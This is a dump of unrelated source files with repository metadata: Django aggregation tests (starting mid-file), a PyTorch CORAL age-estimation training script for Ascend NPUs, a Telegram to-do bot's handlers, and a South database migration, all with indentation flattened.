publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Apress",
"Sams",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1, book__price__lt=Decimal("40.0")).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name,
)
publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__range=[1, 3]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Sams",
"Prentice Hall",
"Morgan Kaufmann",
"Expensive Publisher",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__range=[1, 2]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Sams",
"Prentice Hall",
"Morgan Kaufmann",
],
lambda p: p.name
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__in=[1, 3]).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Sams",
"Morgan Kaufmann",
"Expensive Publisher",
],
lambda p: p.name,
)
publishers = Publisher.objects.annotate(num_books=Count("book")).filter(num_books__isnull=True)
self.assertEqual(len(publishers), 0)
def test_annotation(self):
vals = Author.objects.filter(pk=1).aggregate(Count("friends__id"))
self.assertEqual(vals, {"friends__id__count": 2})
books = Book.objects.annotate(num_authors=Count("authors__name")).filter(num_authors__ge=2).order_by("pk")
self.assertQuerysetEqual(
books, [
"The Definitive Guide to Django: Web Development Done Right",
"Artificial Intelligence: A Modern Approach",
],
lambda b: b.name
)
authors = Author.objects.annotate(num_friends=Count("friends__id", distinct=True)).filter(num_friends=0).order_by("pk")
self.assertQuerysetEqual(
authors, [
"Brad Dayley",
],
lambda a: a.name
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
],
lambda p: p.name
)
publishers = Publisher.objects.filter(book__price__lt=Decimal("40.0")).annotate(num_books=Count("book__id")).filter(num_books__gt=1)
self.assertQuerysetEqual(
publishers, [
"Apress",
],
lambda p: p.name
)
books = Book.objects.annotate(num_authors=Count("authors__id")).filter(authors__name__contains="Norvig", num_authors__gt=1)
self.assertQuerysetEqual(
books, [
"Artificial Intelligence: A Modern Approach",
],
lambda b: b.name
)
def test_more_aggregation(self):
a = Author.objects.get(name__contains='Norvig')
b = Book.objects.get(name__contains='Done Right')
b.authors.add(a)
b.save()
vals = Book.objects.annotate(num_authors=Count("authors__id")).filter(authors__name__contains="Norvig", num_authors__gt=1).aggregate(Avg("rating"))
self.assertEqual(vals, {"rating__avg": 4.25})
def test_even_more_aggregate(self):
publishers = Publisher.objects.annotate(earliest_book=Min("book__pubdate")).exclude(earliest_book=None).order_by("earliest_book").values()
self.assertEqual(
list(publishers), [
{
'earliest_book': datetime.date(1991, 10, 15),
'num_awards': 9,
'id': 4,
'name': 'Morgan Kaufmann'
},
{
'earliest_book': datetime.date(1995, 1, 15),
'num_awards': 7,
'id': 3,
'name': 'Prentice Hall'
},
{
'earliest_book': datetime.date(2007, 12, 6),
'num_awards': 3,
'id': 1,
'name': 'Apress'
},
{
'earliest_book': datetime.date(2008, 3, 3),
'num_awards': 1,
'id': 2,
'name': 'Sams'
}
]
)
vals = Store.objects.aggregate(Max("friday_night_closing"), Min("original_opening"))
self.assertEqual(
vals,
{
"friday_night_closing__max": datetime.time(23, 59, 59),
"original_opening__min": datetime.datetime(1945, 4, 25, 16, 24, 14),
}
)
def test_annotate_values_list(self):
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("pk", "isbn", "mean_age")
self.assertEqual(
list(books), [
(1, "159059725", 34.5),
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("isbn")
self.assertEqual(
list(books), [
('159059725',)
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("mean_age")
self.assertEqual(
list(books), [
(34.5,)
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values_list("mean_age", flat=True)
self.assertEqual(list(books), [34.5])
books = Book.objects.values_list("price").annotate(count=Count("price")).order_by("-count", "price")
self.assertEqual(
list(books), [
(Decimal("29.69"), 2),
(Decimal('23.09'), 1),
(Decimal('30'), 1),
(Decimal('75'), 1),
(Decimal('82.8'), 1),
]
)
| [
"henrique@bastos.net"
] | henrique@bastos.net |
40d60b41be552dcfd2df4f67bf167172d1075756 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_classification/coral-cnn_ID1064_for_PyTorch/model-code/cacd-coral.py | 45795ac09a7b420de8ae37d8e096ba753a70016d | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 16,909 | py | # coding: utf-8
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
#############################################
# Consistent Cumulative Logits with ResNet-34
#############################################
# Imports
import os
import time
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import argparse
import sys
from torch.utils.data import Dataset
from torch.utils.data import DataLoader
from torchvision import transforms
from PIL import Image
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
torch.backends.cudnn.deterministic = True
TRAIN_CSV_PATH = './cacd_train.csv'
VALID_CSV_PATH = './cacd_valid.csv'
TEST_CSV_PATH = './cacd_test.csv'
IMAGE_PATH = '/shared_datasets/CACD/centercropped/jpg'
# Argparse helper
parser = argparse.ArgumentParser()
parser.add_argument('--cuda',
type=int,
default=-1)
parser.add_argument('--seed',
type=int,
default=-1)
parser.add_argument('--numworkers',
type=int,
default=3)
parser.add_argument('--outpath',
type=str,
required=True)
parser.add_argument('--imp_weight',
type=int,
default=0)
args = parser.parse_args()
NUM_WORKERS = args.numworkers
if args.cuda >= 0:
DEVICE = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')
else:
DEVICE = torch.device(f'npu:{NPU_CALCULATE_DEVICE}')
if args.seed == -1:
RANDOM_SEED = None
else:
RANDOM_SEED = args.seed
IMP_WEIGHT = args.imp_weight
PATH = args.outpath
if not os.path.exists(PATH):
os.mkdir(PATH)
LOGFILE = os.path.join(PATH, 'training.log')
TEST_PREDICTIONS = os.path.join(PATH, 'test_predictions.log')
TEST_ALLPROBAS = os.path.join(PATH, 'test_allprobas.tensor')
# Logging
header = []
header.append('PyTorch Version: %s' % torch.__version__)
header.append('CUDA device available: %s' % torch.npu.is_available())
header.append('Using CUDA device: %s' % DEVICE)
header.append('Random Seed: %s' % RANDOM_SEED)
header.append('Task Importance Weight: %s' % IMP_WEIGHT)
header.append('Output Path: %s' % PATH)
header.append('Script: %s' % sys.argv[0])
with open(LOGFILE, 'w') as f:
for entry in header:
print(entry)
f.write('%s\n' % entry)
f.flush()
##########################
# SETTINGS
##########################
# Hyperparameters
learning_rate = 0.0005
num_epochs = 200
# Architecture
NUM_CLASSES = 49
BATCH_SIZE = 256
GRAYSCALE = False
df = pd.read_csv(TRAIN_CSV_PATH, index_col=0)
ages = df['age'].values
del df
ages = torch.tensor(ages, dtype=torch.float)
def task_importance_weights(label_array):
uniq = torch.unique(label_array)
num_examples = label_array.size(0)
m = torch.zeros(uniq.shape[0])
for i, t in enumerate(torch.arange(torch.min(uniq), torch.max(uniq))):
m_k = torch.max(torch.tensor([label_array[label_array > t].size(0),
num_examples - label_array[label_array > t].size(0)]))
m[i] = torch.sqrt(m_k.float())
imp = m/torch.max(m)
return imp
# Data-specific scheme
if not IMP_WEIGHT:
imp = torch.ones(NUM_CLASSES-1, dtype=torch.float)
elif IMP_WEIGHT == 1:
imp = task_importance_weights(ages)
imp = imp[0:NUM_CLASSES-1]
else:
raise ValueError('Incorrect importance weight parameter.')
imp = imp.to(f'npu:{NPU_CALCULATE_DEVICE}')
###################
# Dataset
###################
class CACDDataset(Dataset):
"""Custom Dataset for loading CACD face images"""
def __init__(self,
csv_path, img_dir, transform=None):
df = pd.read_csv(csv_path, index_col=0)
self.img_dir = img_dir
self.csv_path = csv_path
self.img_names = df['file'].values
self.y = df['age'].values
self.transform = transform
def __getitem__(self, index):
img = Image.open(os.path.join(self.img_dir,
self.img_names[index]))
if self.transform is not None:
img = self.transform(img)
label = self.y[index]
levels = [1]*label + [0]*(NUM_CLASSES - 1 - label)
levels = torch.tensor(levels, dtype=torch.float32)
return img, label, levels
def __len__(self):
return self.y.shape[0]
custom_transform = transforms.Compose([transforms.Resize((128, 128)),
transforms.RandomCrop((120, 120)),
transforms.ToTensor()])
train_dataset = CACDDataset(csv_path=TRAIN_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform)
custom_transform2 = transforms.Compose([transforms.Resize((128, 128)),
transforms.CenterCrop((120, 120)),
transforms.ToTensor()])
test_dataset = CACDDataset(csv_path=TEST_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform2)
valid_dataset = CACDDataset(csv_path=VALID_CSV_PATH,
img_dir=IMAGE_PATH,
transform=custom_transform2)
train_loader = DataLoader(dataset=train_dataset,
batch_size=BATCH_SIZE,
shuffle=True,
num_workers=NUM_WORKERS)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
test_loader = DataLoader(dataset=test_dataset,
batch_size=BATCH_SIZE,
shuffle=False,
num_workers=NUM_WORKERS)
##########################
# MODEL
##########################
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes, grayscale):
self.num_classes = num_classes
self.inplanes = 64
if grayscale:
in_dim = 1
else:
in_dim = 3
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(in_dim, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AvgPool2d(4)
self.fc = nn.Linear(512, 1, bias=False)
self.linear_1_bias = nn.Parameter(torch.zeros(self.num_classes-1).float())
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, (2. / n)**.5)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
logits = self.fc(x)
logits = logits + self.linear_1_bias
probas = torch.sigmoid(logits)
return logits, probas
def resnet34(num_classes, grayscale):
"""Constructs a ResNet-34 model."""
model = ResNet(block=BasicBlock,
layers=[3, 4, 6, 3],
num_classes=num_classes,
grayscale=grayscale)
return model
###########################################
# Initialize Cost, Model, and Optimizer
###########################################
def cost_fn(logits, levels, imp):
val = (-torch.sum((F.logsigmoid(logits)*levels
+ (F.logsigmoid(logits) - logits)*(1-levels))*imp,
dim=1))
return torch.mean(val)
torch.manual_seed(RANDOM_SEED)
torch.npu.manual_seed(RANDOM_SEED)
model = resnet34(NUM_CLASSES, GRAYSCALE)
model.to(f'npu:{NPU_CALCULATE_DEVICE}')
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
def compute_mae_and_mse(model, data_loader, device):
mae, mse, num_examples = 0, 0, 0
for i, (features, targets, levels) in enumerate(data_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
targets = targets.to(f'npu:{NPU_CALCULATE_DEVICE}')
logits, probas = model(features)
predict_levels = probas > 0.5
predicted_labels = torch.sum(predict_levels, dim=1)
num_examples += targets.size(0)
mae += torch.sum(torch.abs(predicted_labels - targets))
mse += torch.sum((predicted_labels - targets)**2)
mae = mae.float() / num_examples
mse = mse.float() / num_examples
return mae, mse
start_time = time.time()
best_mae, best_rmse, best_epoch = 999, 999, -1
for epoch in range(num_epochs):
model.train()
for batch_idx, (features, targets, levels) in enumerate(train_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
targets = targets
targets = targets.to(f'npu:{NPU_CALCULATE_DEVICE}')
levels = levels.to(f'npu:{NPU_CALCULATE_DEVICE}')
# FORWARD AND BACK PROP
logits, probas = model(features)
cost = cost_fn(logits, levels, imp)
optimizer.zero_grad()
cost.backward()
# UPDATE MODEL PARAMETERS
optimizer.step()
# LOGGING
if not batch_idx % 50:
s = ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
% (epoch+1, num_epochs, batch_idx,
len(train_dataset)//BATCH_SIZE, cost))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
model.eval()
with torch.set_grad_enabled(False):
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
if valid_mae < best_mae:
best_mae, best_rmse, best_epoch = valid_mae, torch.sqrt(valid_mse), epoch
########## SAVE MODEL #############
torch.save(model.state_dict(), os.path.join(PATH, 'best_model.pt'))
s = 'MAE/RMSE: | Current Valid: %.2f/%.2f Ep. %d | Best Valid : %.2f/%.2f Ep. %d' % (
valid_mae, torch.sqrt(valid_mse), epoch, best_mae, best_rmse, best_epoch)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
s = 'Time elapsed: %.2f min' % ((time.time() - start_time)/60)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
train_mae, train_mse = compute_mae_and_mse(model, train_loader,
device=DEVICE)
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
test_mae, test_mse = compute_mae_and_mse(model, test_loader,
device=DEVICE)
s = 'MAE/RMSE: | Train: %.2f/%.2f | Valid: %.2f/%.2f | Test: %.2f/%.2f' % (
train_mae, torch.sqrt(train_mse),
valid_mae, torch.sqrt(valid_mse),
test_mae, torch.sqrt(test_mse))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
s = 'Total Training Time: %.2f min' % ((time.time() - start_time)/60)
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
########## EVALUATE BEST MODEL ######
model.load_state_dict(torch.load(os.path.join(PATH, 'best_model.pt')))
model.eval()
with torch.set_grad_enabled(False):
train_mae, train_mse = compute_mae_and_mse(model, train_loader,
device=DEVICE)
valid_mae, valid_mse = compute_mae_and_mse(model, valid_loader,
device=DEVICE)
test_mae, test_mse = compute_mae_and_mse(model, test_loader,
device=DEVICE)
s = 'MAE/RMSE: | Best Train: %.2f/%.2f | Best Valid: %.2f/%.2f | Best Test: %.2f/%.2f' % (
train_mae, torch.sqrt(train_mse),
valid_mae, torch.sqrt(valid_mse),
test_mae, torch.sqrt(test_mse))
print(s)
with open(LOGFILE, 'a') as f:
f.write('%s\n' % s)
########## SAVE PREDICTIONS ######
all_pred = []
all_probas = []
with torch.set_grad_enabled(False):
for batch_idx, (features, targets, levels) in enumerate(test_loader):
features = features.to(f'npu:{NPU_CALCULATE_DEVICE}')
logits, probas = model(features)
all_probas.append(probas)
predict_levels = probas > 0.5
predicted_labels = torch.sum(predict_levels, dim=1)
lst = [str(int(i)) for i in predicted_labels]
all_pred.extend(lst)
torch.save(torch.cat(all_probas).to(f'npu:{NPU_CALCULATE_DEVICE}'), TEST_ALLPROBAS)
with open(TEST_PREDICTIONS, 'w') as f:
all_pred = ','.join(all_pred)
f.write(all_pred)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
5e83729a2a9084280b3a088b23a69aadbaf7714d | 41110aaf46c098bbe1906587d7e3bf057514355a | /handlers.py | 0b373b1afc01dc7e74178b327068c72d55bb43f3 | [] | no_license | yourboyfriendsdrug/Thursday-22-04-21 | 5a6fd3f2a369df85381534443e33b600295269b1 | ddea534227787447477df6d2d49f1f46092d4691 | refs/heads/master | 2023-04-25T14:48:28.609493 | 2021-05-06T16:19:34 | 2021-05-06T16:19:34 | 360,564,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,869 | py | from app import bot, dp
from aiogram.types import Message
from config import admin_id, todo, HELP
import time
command = 0
# Dialog state machine shared by all handlers:
#   0 - the user has not chosen anything yet
#   1 - waiting for a date to attach the new task to
#   2 - waiting for the task text to add to the dict
#   3 - waiting for a display option (after /show)
userDate, userTask = 0, 0 # module-level globals holding the current dialog context
async def checkDate(date, message):
    """Validate that ``date`` is a DD.MM.YYYY string.

    Returns True when the date parses. Otherwise notifies the user,
    resets the dialog state and returns False.

    Bug fixes: ``time.strpt.time`` raised AttributeError (the function is
    ``time.strptime``) and ``'dd.mm.YYYY'`` is not a valid strptime format
    (the directives are ``%d.%m.%Y``), so every date was rejected/crashed.
    """
    global command
    try:
        # strptime raises ValueError when the text does not match the format.
        time.strptime(date, '%d.%m.%Y')
        return True
    except ValueError:
        await message.answer(text="Неправильный формат даты")
        command = 0
        return False
async def send_to_admin(dp):
    """Notify the administrator that the bot has started up."""
    startup_text = "Бот запущен"
    await bot.send_message(chat_id=admin_id, text=startup_text)
@dp.message_handler(commands="start")
async def start(message: Message):
    """Handle /start: reply with a simple liveness message."""
    reply = "Работает"
    await message.answer(text=reply)
@dp.message_handler(commands="add")
async def add(message: Message):
    """Handle /add: prompt for a date and enter state 1 (awaiting a date)."""
    global command
    prompt = "Введите дату в формате дд.мм.гггг"
    await message.answer(text=prompt)
    command = 1
@dp.message_handler(commands="done")
async def done(message: Message):
    """Handle /done.

    NOTE(review): currently a placeholder -- it only reports that the bot
    is alive; marking a task as completed is not implemented yet.
    """
    reply = "Работает"
    await message.answer(text=reply)
@dp.message_handler(commands="help")
async def help(message: Message):
    """Handle /help: send the help text imported from config.

    Bug fix: the handler used to send the literal string "HELP" instead of
    the HELP constant imported from config at the top of this module.
    """
    await message.answer(text=HELP)
@dp.message_handler(commands="show")
async def show(message: Message):
    """Handle /show: offer display options and enter state 3."""
    global command
    options = "[ 0 ] - вывести все задачи\n[ 1 ] - вывести задачи по определенной дате"
    await message.answer(text=options)
    command = 3
@dp.message_handler()
async def inputText(message: Message):
    """Route free-form text according to the dialog state in ``command``.

    Bug fixes:
      * the handler was registered for ``commands="start"`` (duplicating the
        /start handler), so plain text messages never reached it -- it is now
        the catch-all text handler;
      * it validated the previous ``userDate`` value (via an un-awaited
        coroutine comparison that could never trigger) instead of the text
        just received -- validation is now done inline on ``message.text``;
      * state 3 never reset, so every later message was treated as a
        display option.
    """
    global userDate, userTask, command, todo
    if command == 1:
        # Expecting a date: validate the text the user just sent.
        userDate = message.text
        try:
            time.strptime(userDate, '%d.%m.%Y')
        except ValueError:
            await message.answer(text="Неправильный формат даты")
            command = 0
            return
        await message.answer("Введите, что нужно сделать")
        command = 2
    elif command == 2:
        # Expecting the task text: store it under the previously given date.
        userTask = message.text
        todo.setdefault(userDate, []).append(userTask)
        await message.answer(f"Добавлена '{userTask}' на {userDate} ")
        command = 0
    elif command == 3:
        # Expecting a display option from /show.
        if message.text == "0":
            # Print every task, one message per task, dates sorted.
            for date in sorted(todo.keys()):
                for task in todo[date]:
                    await message.answer(text=f"[{date} - '{task}']")
        command = 0
""
] | |
e7c0515ee7a896fe25357447cbf5bdfbacdeb236 | 99ca3abf85542ef90f9525fa73e359ef00b3f713 | /raven/migrations/0018_auto__del_field_feed_dead.py | a0ae9474cb55f66144c61be19cd045d6aaa049dd | [] | no_license | achiang/readraven | 408621fe7f6ba33078a089ae3d744c7db587db53 | 56aca6ce21b158e824a6bc62a4bdc867f6f75713 | refs/heads/master | 2020-12-25T12:08:09.479948 | 2013-08-11T21:35:17 | 2013-08-11T21:35:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,452 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South migration 0018: drop the ``dead`` boolean column from ``Feed``."""
    def forwards(self, orm):
        # Deleting field 'Feed.dead'
        db.delete_column(u'raven_feed', 'dead')
    def backwards(self, orm):
        # Adding field 'Feed.dead'
        db.add_column(u'raven_feed', 'dead',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)
    # Frozen ORM snapshot captured when this migration was generated.
    # South materializes it as the ``orm`` argument above; do not edit by hand.
    models = {
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'raven.feed': {
            'Meta': {'object_name': 'Feed'},
            'description': ('django.db.models.fields.TextField', [], {}),
            'fetch_frequency': ('django.db.models.fields.IntegerField', [], {'default': '30'}),
            'generator': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_fetched': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'link': ('django.db.models.fields.TextField', [], {'unique': 'True'}),
            'site': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        u'raven.feeditem': {
            'Meta': {'unique_together': "(('feed', 'guid'),)", 'object_name': 'FeedItem', 'index_together': "[['feed', 'guid'], ['feed', 'link'], ['feed', 'title'], ['feed', 'atom_id'], ['feed', 'published']]"},
            'atom_id': ('django.db.models.fields.TextField', [], {'default': "''", 'db_index': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': u"orm['raven.Feed']"}),
            'guid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'link': ('django.db.models.fields.URLField', [], {'max_length': '1023'}),
            'published': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'reader_guid': ('django.db.models.fields.CharField', [], {'max_length': '48', 'unique': 'True', 'null': 'True'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        u'raven.userfeed': {
            'Meta': {'unique_together': "(('user', 'feed'),)", 'object_name': 'UserFeed', 'index_together': "[['user', 'feed']]"},
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeds'", 'to': u"orm['raven.Feed']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeds'", 'to': u"orm['usher.User']"})
        },
        u'raven.userfeeditem': {
            'Meta': {'unique_together': "(('user', 'feed', 'item'),)", 'object_name': 'UserFeedItem', 'index_together': "[['user', 'feed', 'read', 'item']]"},
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'feeditems'", 'to': u"orm['raven.Feed']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeditems'", 'to': u"orm['raven.FeedItem']"}),
            'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'starred': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'userfeeditems'", 'to': u"orm['usher.User']"})
        },
        u'taggit.tag': {
            'Meta': {'object_name': 'Tag'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
        },
        u'taggit.taggeditem': {
            'Meta': {'object_name': 'TaggedItem'},
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
            'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
        },
        u'usher.user': {
            'Meta': {'object_name': 'User'},
            'credential': ('oauth2client.django_orm.CredentialsField', [], {'null': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254', 'db_index': 'True'}),
            'flow': ('oauth2client.django_orm.FlowField', [], {'null': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'sync_task_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'max_length': '254'})
        }
    }
    complete_apps = ['raven']
"alex@chizang.net"
] | alex@chizang.net |
